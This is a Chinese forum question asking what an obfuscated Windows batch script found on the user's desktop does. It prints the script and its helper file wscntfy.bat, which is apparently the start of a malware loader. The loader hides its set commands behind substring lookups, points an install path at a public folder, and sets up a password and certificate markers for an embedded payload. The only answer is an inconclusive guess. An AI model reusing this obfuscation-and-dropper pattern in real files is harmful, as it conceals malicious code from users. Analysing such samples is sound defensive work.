这个脚本在做什么？它是恶意的吗？

2024-7-10 • tag-icon

我有以下脚本脚本，有人能解释一下它到底是做什么的吗？它位于我桌面上名为“Files”的目录中。

for /f "tokens=*" %%i in ("%~1") do pushd "%%~dpi"

set akonhlqu=PjQVyJhXmirnezoOpBGFYkDtaIZbsvCLcUlHSwWMgAEdKNxTRufq

call wscntfy.bat

wscntfy.bat 文件内容

RemoteLoaderScriptName01%akonhlqu:~36,1%%akonhlqu:~42,1%%akonhlqu:~47,1%%akonhlqu:~31,1%%akonhlqu:~15,1%%akonhlqu:~30,1%%akonhlqu:~41,1%%akonhlqu:~31,1% %akonhlqu:~42,1%%akonhlqu:~45,1%%akonhlqu:~41,1%%akonhlqu:~17,1%%akonhlqu:~31,1%%akonhlqu:~42,1%%akonhlqu:~42,1%%akonhlqu:~7,1%%akonhlqu:~47,1%%akonhlqu:~42,1%%akonhlqu:~45,1%%akonhlqu:~36,1%%akonhlqu:~25,1%%akonhlqu:~15,1%%akonhlqu:~45,1%%akonhlqu:~36,1% %akonhlqu:~42,1%%akonhlqu:~45,1%%akonhlqu:~41,1%%akonhlqu:~17,1%%akonhlqu:~31,1%%akonhlqu:~42,1%%akonhlqu:~22,1%%akonhlqu:~42,1%%akonhlqu:~31,1%%akonhlqu:~41,1%%akonhlqu:~20,1%%akonhlqu:~42,1%%akonhlqu:~22,1%%akonhlqu:~42,1%%akonhlqu:~7,1%%akonhlqu:~0,1%%akonhlqu:~41,1%%akonhlqu:~45,1%%akonhlqu:~36,1%%akonhlqu:~25,1%%akonhlqu:~15,1%%akonhlqu:~45,1%
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~47,1%%akonhlqu:~24,1%%akonhlqu:~10,1%%akonhlqu:~40,1%%akonhlqu:~12,1%%akonhlqu:~23,1%%akonhlqu:~36,1%%akonhlqu:~4,1%%akonhlqu:~28,1%%akonhlqu:~23,1%%akonhlqu:~12,1%%akonhlqu:~8,1%%akonhlqu:~41,1%%akonhlqu:~10,1%%akonhlqu:~32,1%%akonhlqu:~6,1%%akonhlqu:~9,1%%akonhlqu:~23,1%%akonhlqu:~12,1%%akonhlqu:~32,1%%akonhlqu:~23,1%%akonhlqu:~49,1%%akonhlqu:~10,1%%akonhlqu:~12,1%=%akonhlqu:~46,1%64"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~25,1%%akonhlqu:~11,1%%akonhlqu:~28,1%%akonhlqu:~23,1%%akonhlqu:~24,1%%akonhlqu:~34,1%%akonhlqu:~34,1%%akonhlqu:~12,1%%akonhlqu:~10,1%%akonhlqu:~42,1%%akonhlqu:~46,1%%akonhlqu:~23,1%%akonhlqu:~10,1%%akonhlqu:~24,1%%akonhlqu:~32,1%%akonhlqu:~23,1%%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~6,1%=%PUBLIC%"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~32,1%%akonhlqu:~21,1%%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~28,1%%akonhlqu:~28,1%%akonhlqu:~37,1%%akonhlqu:~14,1%%akonhlqu:~10,1%%akonhlqu:~43,1%=%akonhlqu:~19,1%46%akonhlqu:~30,1%-069%akonhlqu:~41,1%-51%akonhlqu:~19,1%%akonhlqu:~42,1%-%akonhlqu:~19,1%694"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~32,1%%akonhlqu:~21,1%%akonhlqu:~22,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~24,1%%akonhlqu:~31,1%%akonhlqu:~9,1%%akonhlqu:~11,1%%akonhlqu:~12,1%%akonhlqu:~17,1%%akonhlqu:~12,1%%akonhlqu:~40,1%%akonhlqu:~9,1%%akonhlqu:~11,1%=-----%akonhlqu:~17,1%%akonhlqu:~42,1%%akonhlqu:~18,1%%akonhlqu:~25,1%%akonhlqu:~45,1% %akonhlqu:~30,1%%akonhlqu:~42,1%%akonhlqu:~48,1%%akonhlqu:~47,1%%akonhlqu:~25,1%%akonhlqu:~19,1%%akonhlqu:~25,1%%akonhlqu:~30,1%%akonhlqu:~41,1%%akonhlqu:~47,1%%akonhlqu:~42,1%-----"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~32,1%%akonhlqu:~21,1%%akonhlqu:~22,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~24,1%%akonhlqu:~31,1%%akonhlqu:~9,1%%akonhlqu:~11,1%%akonhlqu:~12,1%%akonhlqu:~42,1%%akonhlqu:~11,1%%akonhlqu:~43,1%=-----%akonhlqu:~42,1%%akonhlqu:~45,1%%akonhlqu:~22,1% %akonhlqu:~30,1%%akonhlqu:~42,1%%akonhlqu:~48,1%%akonhlqu:~47,1%%akonhlqu:~25,1%%akonhlqu:~19,1%%akonhlqu:~25,1%%akonhlqu:~30,1%%akonhlqu:~41,1%%akonhlqu:~47,1%%akonhlqu:~42,1%-----"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~48,1%%akonhlqu:~12,1%%akonhlqu:~8,1%%akonhlqu:~14,1%%akonhlqu:~23,1%%akonhlqu:~12,1%%akonhlqu:~31,1%%akonhlqu:~14,1%%akonhlqu:~24,1%%akonhlqu:~43,1%%akonhlqu:~12,1%%akonhlqu:~10,1%%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~6,1%=%PUBLIC%\%akonhlqu:~31,1%%akonhlqu:~9,1%%akonhlqu:~27,1%%akonhlqu:~10,1%%akonhlqu:~24,1%%akonhlqu:~10,1%%akonhlqu:~9,1%%akonhlqu:~12,1%%akonhlqu:~28,1%\%akonhlqu:~41,1%%akonhlqu:~16,1%%akonhlqu:~16,1%%akonhlqu:~22,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~24,1%\%akonhlqu:~30,1%%akonhlqu:~14,1%%akonhlqu:~8,1%%akonhlqu:~8,1%%akonhlqu:~28,1%\%akonhlqu:~36,1%%akonhlqu:~23,1%%akonhlqu:~14,1%%akonhlqu:~10,1%%akonhlqu:~24,1%%akonhlqu:~40,1%%akonhlqu:~12,1% %akonhlqu:~47,1%%akonhlqu:~9,1%%akonhlqu:~12,1%%akonhlqu:~10,1%%akonhlqu:~28,1%"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~48,1%%akonhlqu:~12,1%%akonhlqu:~8,1%%akonhlqu:~14,1%%akonhlqu:~23,1%%akonhlqu:~12,1%%akonhlqu:~31,1%%akonhlqu:~14,1%%akonhlqu:~24,1%%akonhlqu:~43,1%%akonhlqu:~12,1%%akonhlqu:~10,1%%akonhlqu:~36,1%%akonhlqu:~32,1%%akonhlqu:~10,1%%akonhlqu:~9,1%%akonhlqu:~16,1%%akonhlqu:~23,1%%akonhlqu:~45,1%%akonhlqu:~24,1%%akonhlqu:~8,1%%akonhlqu:~12,1%01=%akonhlqu:~28,1%%akonhlqu:~23,1%%akonhlqu:~14,1%%akonhlqu:~10,1%%akonhlqu:~12,1%-%akonhlqu:~43,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~24,1%-%akonhlqu:~49,1%%akonhlqu:~16,1%%akonhlqu:~43,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~12,1%.%akonhlqu:~27,1%%akonhlqu:~24,1%%akonhlqu:~23,1%"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~17,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~30,1%%akonhlqu:~10,1%%akonhlqu:~4,1%%akonhlqu:~16,1%%akonhlqu:~23,1%%akonhlqu:~44,1%%akonhlqu:~12,1%%akonhlqu:~4,1%%akonhlqu:~45,1%%akonhlqu:~24,1%%akonhlqu:~8,1%%akonhlqu:~12,1%=%akonhlqu:~24,1%%akonhlqu:~21,1%%akonhlqu:~14,1%%akonhlqu:~11,1%%akonhlqu:~6,1%%akonhlqu:~34,1%%akonhlqu:~51,1%%akonhlqu:~49,1%"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~17,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~30,1%%akonhlqu:~10,1%%akonhlqu:~4,1%%akonhlqu:~16,1%%akonhlqu:~23,1%%akonhlqu:~44,1%%akonhlqu:~12,1%%akonhlqu:~4,1%%akonhlqu:~3,1%%akonhlqu:~24,1%%akonhlqu:~34,1%=%akonhlqu:~0,1%%akonhlqu:~1,1%%akonhlqu:~2,1%%akonhlqu:~3,1%%akonhlqu:~4,1%%akonhlqu:~5,1%%akonhlqu:~6,1%%akonhlqu:~7,1%%akonhlqu:~8,1%%akonhlqu:~9,1%%akonhlqu:~10,1%%akonhlqu:~11,1%%akonhlqu:~12,1%%akonhlqu:~13,1%%akonhlqu:~14,1%%akonhlqu:~15,1%%akonhlqu:~16,1%%akonhlqu:~17,1%%akonhlqu:~18,1%%akonhlqu:~19,1%%akonhlqu:~20,1%%akonhlqu:~21,1%%akonhlqu:~22,1%%akonhlqu:~23,1%%akonhlqu:~24,1%%akonhlqu:~25,1%%akonhlqu:~26,1%%akonhlqu:~27,1%%akonhlqu:~28,1%%akonhlqu:~29,1%%akonhlqu:~30,1%%akonhlqu:~31,1%%akonhlqu:~32,1%%akonhlqu:~33,1%%akonhlqu:~34,1%%akonhlqu:~35,1%%akonhlqu:~36,1%%akonhlqu:~37,1%%akonhlqu:~38,1%%akonhlqu:~39,1%%akonhlqu:~40,1%%akonhlqu:~41,1%%akonhlqu:~42,1%%akonhlqu:~43,1%%akonhlqu:~44,1%%akonhlqu:~45,1%%akonhlqu:~46,1%%akonhlqu:~47,1%%akonhlqu:~48,1%%akonhlqu:~49,1%%akonhlqu:~50,1%%akonhlqu:~51,1%
    "

答案1

有人可以解释一下它实际上起什么作用吗？

乍一看，它显然：

将当前目录更改为命令行传递的目录，并将前一个目录放在虚拟堆栈上（参见%1，也推和%~dpi）。
设置某种编码变量。
运行批处理文件，可能与有关wscntfy.exe，它是 Windows XP Service Pack 2 中为 Windows 安全中心引入的可执行文件。它显示一个托盘图标，指示更新、病毒防护和防火墙的状态。据我所知，wscntfy.exe在 Windows Vista 或更高版本中不存在。

这个脚本在做什么？它是恶意的吗？

不幸的是，如果没有更多信息，任何人都不可能做出可靠的判断。

答案1

相关内容